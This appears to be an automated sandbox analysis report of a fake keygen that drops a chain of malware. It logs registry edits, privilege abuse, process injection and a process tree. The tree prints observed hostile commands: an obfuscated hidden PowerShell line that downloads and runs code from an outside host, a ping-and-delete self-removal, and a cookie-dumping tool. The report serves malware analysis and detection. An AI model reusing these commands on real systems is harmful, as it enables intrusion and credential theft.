\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = e9babfbca321d701 MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\MigrationTime = 6c3a3b6c55add601 MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url2 = "https://login.aliexpress.com/" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main\OperationalData = "1" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\Favorites MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\ManagerHistoryComplete = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\LowRegistry MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\PrivacyAdvanced = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\Extensions MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VendorId = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\InternetRegistry MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\CIPolicyState = "0" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Extensible Cache MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory\UUID = "{994E7146-4490-437C-8EF2-D556C67B0DCC}" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdge.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 askinstall20.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e askinstall20.exe -
Runs ping.exe 1 TTPs 2 IoCs
pid Process 2560 PING.EXE 5848 PING.EXE -
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 104 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 113 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4652 setups.tmp 4652 setups.tmp 1728 multitimer.exe 1728 multitimer.exe 1728 multitimer.exe 1728 multitimer.exe 1728 multitimer.exe 1728 multitimer.exe 1728 multitimer.exe 1728 multitimer.exe 1728 multitimer.exe 1728 multitimer.exe 1728 multitimer.exe 1728 multitimer.exe 1728 multitimer.exe 1728 multitimer.exe 1728 multitimer.exe 1728 multitimer.exe 1728 multitimer.exe 1728 multitimer.exe 1728 multitimer.exe 1728 multitimer.exe 1728 multitimer.exe 1728 multitimer.exe 1728 multitimer.exe 1728 multitimer.exe 1728 multitimer.exe 1728 multitimer.exe 1728 multitimer.exe 1728 multitimer.exe 1728 multitimer.exe 1728 multitimer.exe 1728 multitimer.exe 1728 multitimer.exe 1728 multitimer.exe 1728 multitimer.exe 1728 multitimer.exe 1728 multitimer.exe 1728 multitimer.exe 1728 multitimer.exe 1728 multitimer.exe 1728 multitimer.exe 1728 multitimer.exe 1728 multitimer.exe 1728 multitimer.exe 1728 multitimer.exe 1728 multitimer.exe 1728 multitimer.exe 1728 multitimer.exe 1728 multitimer.exe 1728 multitimer.exe 1728 multitimer.exe 1728 multitimer.exe 1728 multitimer.exe 1728 multitimer.exe 1728 multitimer.exe 1728 multitimer.exe 1728 multitimer.exe 1728 multitimer.exe 1728 multitimer.exe 1728 multitimer.exe 1728 multitimer.exe 1728 multitimer.exe 1728 multitimer.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process 1000 MicrosoftEdgeCP.exe 1000 MicrosoftEdgeCP.exe -
Suspicious use of AdjustPrivilegeToken 49 IoCs
description pid Process Token: SeDebugPrivilege 4472 Setup.exe Token: SeCreateTokenPrivilege 4688 askinstall20.exe Token: SeAssignPrimaryTokenPrivilege 4688 askinstall20.exe Token: SeLockMemoryPrivilege 4688 askinstall20.exe Token: SeIncreaseQuotaPrivilege 4688 askinstall20.exe Token: SeMachineAccountPrivilege 4688 askinstall20.exe Token: SeTcbPrivilege 4688 askinstall20.exe Token: SeSecurityPrivilege 4688 askinstall20.exe Token: SeTakeOwnershipPrivilege 4688 askinstall20.exe Token: SeLoadDriverPrivilege 4688 askinstall20.exe Token: SeSystemProfilePrivilege 4688 askinstall20.exe Token: SeSystemtimePrivilege 4688 askinstall20.exe Token: SeProfSingleProcessPrivilege 4688 askinstall20.exe Token: SeIncBasePriorityPrivilege 4688 askinstall20.exe Token: SeCreatePagefilePrivilege 4688 askinstall20.exe Token: SeCreatePermanentPrivilege 4688 askinstall20.exe Token: SeBackupPrivilege 4688 askinstall20.exe Token: SeRestorePrivilege 4688 askinstall20.exe Token: SeShutdownPrivilege 4688 askinstall20.exe Token: SeDebugPrivilege 4688 askinstall20.exe Token: SeAuditPrivilege 4688 askinstall20.exe Token: SeSystemEnvironmentPrivilege 4688 askinstall20.exe Token: SeChangeNotifyPrivilege 4688 askinstall20.exe Token: SeRemoteShutdownPrivilege 4688 askinstall20.exe Token: SeUndockPrivilege 4688 askinstall20.exe Token: SeSyncAgentPrivilege 4688 askinstall20.exe Token: SeEnableDelegationPrivilege 4688 askinstall20.exe Token: SeManageVolumePrivilege 4688 askinstall20.exe Token: SeImpersonatePrivilege 4688 askinstall20.exe Token: SeCreateGlobalPrivilege 4688 askinstall20.exe Token: 31 4688 askinstall20.exe Token: 32 4688 askinstall20.exe Token: 33 4688 askinstall20.exe Token: 34 4688 askinstall20.exe Token: 35 4688 askinstall20.exe Token: SeDebugPrivilege 3124 taskkill.exe Token: SeDebugPrivilege 3024 multitimer.exe Token: SeDebugPrivilege 3300 MicrosoftEdge.exe Token: SeDebugPrivilege 3300 MicrosoftEdge.exe Token: SeDebugPrivilege 3300 MicrosoftEdge.exe Token: SeDebugPrivilege 3300 MicrosoftEdge.exe Token: SeDebugPrivilege 1388 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 1388 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 1388 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 1388 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 1728 multitimer.exe Token: SeManageVolumePrivilege 1696 md2_2efs.exe Token: SeManageVolumePrivilege 1696 md2_2efs.exe Token: SeManageVolumePrivilege 1696 md2_2efs.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 3988 Setup3310.tmp -
Suspicious use of SetWindowsHookEx 17 IoCs
pid Process 4536 setups.exe 4652 setups.tmp 3300 MicrosoftEdge.exe 1000 MicrosoftEdgeCP.exe 1000 MicrosoftEdgeCP.exe 1776 zdqitbmucpd.exe 1868 vict.exe 720 zdqitbmucpd.tmp 4260 vict.tmp 4608 Setup3310.exe 1096 vpn.exe 1180 app.exe 1168 olvumuzpbdl.exe 1092 IBInstaller_97039.exe 3988 Setup3310.tmp 2700 vpn.tmp 3024 IBInstaller_97039.tmp -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4708 wrote to memory of 4256 4708 3d_Video_Player_4_5_serial_maker.exe 78 PID 4708 wrote to memory of 4256 4708 3d_Video_Player_4_5_serial_maker.exe 78 PID 4708 wrote to memory of 4256 4708 3d_Video_Player_4_5_serial_maker.exe 78 PID 4256 wrote to memory of 560 4256 cmd.exe 81 PID 4256 wrote to memory of 560 4256 cmd.exe 81 PID 4256 wrote to memory of 560 4256 cmd.exe 81 PID 4256 wrote to memory of 656 4256 cmd.exe 82 PID 4256 wrote to memory of 656 4256 cmd.exe 82 PID 4256 wrote to memory of 656 4256 cmd.exe 82 PID 4256 wrote to memory of 976 4256 cmd.exe 83 PID 4256 wrote to memory of 976 4256 cmd.exe 83 PID 4256 wrote to memory of 976 4256 cmd.exe 83 PID 4256 wrote to memory of 1724 4256 cmd.exe 84 PID 4256 wrote to memory of 1724 4256 cmd.exe 84 PID 4256 wrote to memory of 1724 4256 cmd.exe 84 PID 560 wrote to memory of 4432 560 keygen-pr.exe 85 PID 560 wrote to memory of 4432 560 keygen-pr.exe 85 PID 560 wrote to memory of 4432 560 keygen-pr.exe 85 PID 1724 wrote to memory of 4472 1724 keygen-step-4.exe 86 PID 1724 wrote to memory of 4472 1724 keygen-step-4.exe 86 PID 4432 wrote to memory of 2184 4432 key.exe 87 PID 4432 wrote to memory of 2184 4432 key.exe 87 PID 4432 wrote to memory of 2184 4432 key.exe 87 PID 976 wrote to memory of 2256 976 keygen-step-3.exe 88 PID 976 wrote to memory of 2256 976 keygen-step-3.exe 88 PID 976 wrote to memory of 2256 976 keygen-step-3.exe 88 PID 2256 wrote to memory of 2560 2256 cmd.exe 90 PID 2256 wrote to memory of 2560 2256 cmd.exe 90 PID 2256 wrote to memory of 2560 2256 cmd.exe 90 PID 4472 wrote to memory of 3024 4472 Setup.exe 91 PID 4472 wrote to memory of 3024 4472 Setup.exe 91 PID 4472 wrote to memory of 4536 4472 Setup.exe 92 PID 4472 wrote to memory of 4536 4472 Setup.exe 92 PID 4472 wrote to memory of 4536 4472 Setup.exe 92 PID 1724 wrote to memory of 4688 1724 keygen-step-4.exe 93 PID 1724 wrote to memory of 4688 1724 keygen-step-4.exe 93 PID 1724 wrote to memory of 4688 1724 keygen-step-4.exe 93 PID 4536 wrote to memory of 4652 4536 setups.exe 94 PID 4536 wrote to memory of 4652 4536 setups.exe 94 PID 4536 wrote to memory of 4652 4536 setups.exe 94 PID 4688 wrote to memory of 4764 4688 askinstall20.exe 96 PID 4688 wrote to memory of 4764 4688 askinstall20.exe 96 PID 4688 wrote to memory of 4764 4688 askinstall20.exe 96 PID 4764 wrote to memory of 3124 4764 cmd.exe 98 PID 4764 wrote to memory of 3124 4764 cmd.exe 98 PID 4764 wrote to memory of 3124 4764 cmd.exe 98 PID 3024 wrote to memory of 4388 3024 multitimer.exe 104 PID 3024 wrote to memory of 4388 3024 multitimer.exe 104 PID 1724 wrote to memory of 1696 1724 keygen-step-4.exe 105 PID 1724 wrote to memory of 1696 1724 keygen-step-4.exe 105 PID 1724 wrote to memory of 1696 1724 keygen-step-4.exe 105 PID 4388 wrote to memory of 1728 4388 multitimer.exe 106 PID 4388 wrote to memory of 1728 4388 multitimer.exe 106 PID 1000 wrote to memory of 1388 1000 MicrosoftEdgeCP.exe 103 PID 1000 wrote to memory of 1388 1000 MicrosoftEdgeCP.exe 103 PID 1000 wrote to memory of 1388 1000 MicrosoftEdgeCP.exe 103 PID 1000 wrote to memory of 1388 1000 MicrosoftEdgeCP.exe 103 PID 1000 wrote to memory of 1388 1000 MicrosoftEdgeCP.exe 103 PID 1728 wrote to memory of 1776 1728 multitimer.exe 107 PID 1728 wrote to memory of 1776 1728 multitimer.exe 107 PID 1728 wrote to memory of 1776 1728 multitimer.exe 107 PID 1728 wrote to memory of 1868 1728 multitimer.exe 108 PID 1728 wrote to memory of 1868 1728 multitimer.exe 108 PID 1728 wrote to memory of 1868 1728 multitimer.exe 108
Processes
-
C:\Users\Admin\AppData\Local\Temp\3d_Video_Player_4_5_serial_maker.exe"C:\Users\Admin\AppData\Local\Temp\3d_Video_Player_4_5_serial_maker.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4708 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:4256 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:560 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4432 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat5⤵PID:2184
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exekeygen-step-1.exe3⤵
- Executes dropped EXE
PID:656
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exekeygen-step-3.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:976 -
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:2256 -
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
PID:2560
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exekeygen-step-4.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1724 -
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4472 -
C:\Users\Admin\AppData\Local\Temp\SLMVN0XLEV\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\SLMVN0XLEV\multitimer.exe" 0 3060197d33d91c80.94013368 0 1015⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3024 -
C:\Users\Admin\AppData\Local\Temp\SLMVN0XLEV\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\SLMVN0XLEV\multitimer.exe" 1 3.1616696302.605cd3ee54a48 1016⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4388 -
C:\Users\Admin\AppData\Local\Temp\SLMVN0XLEV\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\SLMVN0XLEV\multitimer.exe" 2 3.1616696302.605cd3ee54a487⤵
- Executes dropped EXE
- Checks for any installed AV software in registry
- Maps connected drives based on registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1728 -
C:\Users\Admin\AppData\Local\Temp\raj1nn3wfe5\zdqitbmucpd.exe"C:\Users\Admin\AppData\Local\Temp\raj1nn3wfe5\zdqitbmucpd.exe" /VERYSILENT8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1776 -
C:\Users\Admin\AppData\Local\Temp\is-4AU5G.tmp\zdqitbmucpd.tmp"C:\Users\Admin\AppData\Local\Temp\is-4AU5G.tmp\zdqitbmucpd.tmp" /SL5="$202E8,2592217,780800,C:\Users\Admin\AppData\Local\Temp\raj1nn3wfe5\zdqitbmucpd.exe" /VERYSILENT9⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:720 -
C:\Users\Admin\AppData\Local\Temp\is-SSIP4.tmp\winlthsth.exe"C:\Users\Admin\AppData\Local\Temp\is-SSIP4.tmp\winlthsth.exe"10⤵PID:4576
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4576 -s 72811⤵
- Program crash
PID:1736
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\ukz2me0wg5w\vict.exe"C:\Users\Admin\AppData\Local\Temp\ukz2me0wg5w\vict.exe" /VERYSILENT /id=5358⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1868 -
C:\Users\Admin\AppData\Local\Temp\is-AHRBF.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-AHRBF.tmp\vict.tmp" /SL5="$202EA,870426,780800,C:\Users\Admin\AppData\Local\Temp\ukz2me0wg5w\vict.exe" /VERYSILENT /id=5359⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:4260 -
C:\Users\Admin\AppData\Local\Temp\is-EPPRR.tmp\winhost.exe"C:\Users\Admin\AppData\Local\Temp\is-EPPRR.tmp\winhost.exe" 53510⤵PID:5004
-
C:\Windows\SysWOW64\cmd.execmd /C regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\5H1S5dPXa.dll"11⤵PID:808
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 /s "C:\Users\Admin\AppData\Local\Temp\5H1S5dPXa.dll"12⤵PID:5144
-
C:\Windows\system32\regsvr32.exe/s "C:\Users\Admin\AppData\Local\Temp\5H1S5dPXa.dll"13⤵PID:5236
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\5H1S5dPXa.dllyZoBjfDLM.dll"11⤵PID:3296
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 /s "C:\Users\Admin\AppData\Local\Temp\5H1S5dPXa.dllyZoBjfDLM.dll"12⤵PID:5428
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"11⤵PID:3236
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"12⤵PID:7216
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\4c14ecc0p4b\AwesomePoolU1.exe"C:\Users\Admin\AppData\Local\Temp\4c14ecc0p4b\AwesomePoolU1.exe"8⤵PID:648
-
C:\Users\Admin\AppData\Local\Temp\is-9R4BA.tmp\lylal220.tmp"C:\Users\Admin\AppData\Local\Temp\is-9R4BA.tmp\lylal220.tmp" /SL5="$1042E,491750,408064,C:\Program Files (x86)\Versium Research\Versium Research\lylal220.exe"9⤵PID:5212
-
C:\Users\Admin\AppData\Local\Temp\is-20VPN.tmp\Microsoft.exe"C:\Users\Admin\AppData\Local\Temp\is-20VPN.tmp\Microsoft.exe" /S /UID=lylal22010⤵PID:4712
-
C:\Program Files\Windows Sidebar\LMFGHQLWLR\irecord.exe"C:\Program Files\Windows Sidebar\LMFGHQLWLR\irecord.exe" /VERYSILENT11⤵PID:4528
-
C:\Users\Admin\AppData\Local\Temp\is-09JTA.tmp\irecord.tmp"C:\Users\Admin\AppData\Local\Temp\is-09JTA.tmp\irecord.tmp" /SL5="$50268,6265333,408064,C:\Program Files\Windows Sidebar\LMFGHQLWLR\irecord.exe" /VERYSILENT12⤵PID:2728
-
-
-
C:\Users\Admin\AppData\Local\Temp\37-4d2b5-4b1-211b7-931f0d92bc9fe\Dejiqemytu.exe"C:\Users\Admin\AppData\Local\Temp\37-4d2b5-4b1-211b7-931f0d92bc9fe\Dejiqemytu.exe"11⤵PID:1588
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\r5auor0i.q1h\gaooo.exe & exit12⤵PID:6784
-
C:\Users\Admin\AppData\Local\Temp\r5auor0i.q1h\gaooo.exeC:\Users\Admin\AppData\Local\Temp\r5auor0i.q1h\gaooo.exe13⤵PID:5932
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt14⤵PID:3264
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt14⤵PID:7468
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nl0axktd.lzt\md7_7dfj.exe & exit12⤵PID:7624
-
C:\Users\Admin\AppData\Local\Temp\nl0axktd.lzt\md7_7dfj.exeC:\Users\Admin\AppData\Local\Temp\nl0axktd.lzt\md7_7dfj.exe13⤵PID:6040
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cjrhzvlr.llr\customer6.exe & exit12⤵PID:7180
-
C:\Users\Admin\AppData\Local\Temp\cjrhzvlr.llr\customer6.exeC:\Users\Admin\AppData\Local\Temp\cjrhzvlr.llr\customer6.exe13⤵PID:6464
-
C:\Users\Admin\AppData\Local\Temp\RarSFX5\main.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX5\main.exe"14⤵PID:6160
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hvtfhmct.5zg\askinstall31.exe & exit12⤵PID:7856
-
C:\Users\Admin\AppData\Local\Temp\hvtfhmct.5zg\askinstall31.exeC:\Users\Admin\AppData\Local\Temp\hvtfhmct.5zg\askinstall31.exe13⤵PID:6908
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kvvn0uys.xq0\HookSetp.exe & exit12⤵PID:3436
-
C:\Users\Admin\AppData\Local\Temp\kvvn0uys.xq0\HookSetp.exeC:\Users\Admin\AppData\Local\Temp\kvvn0uys.xq0\HookSetp.exe13⤵PID:6780
-
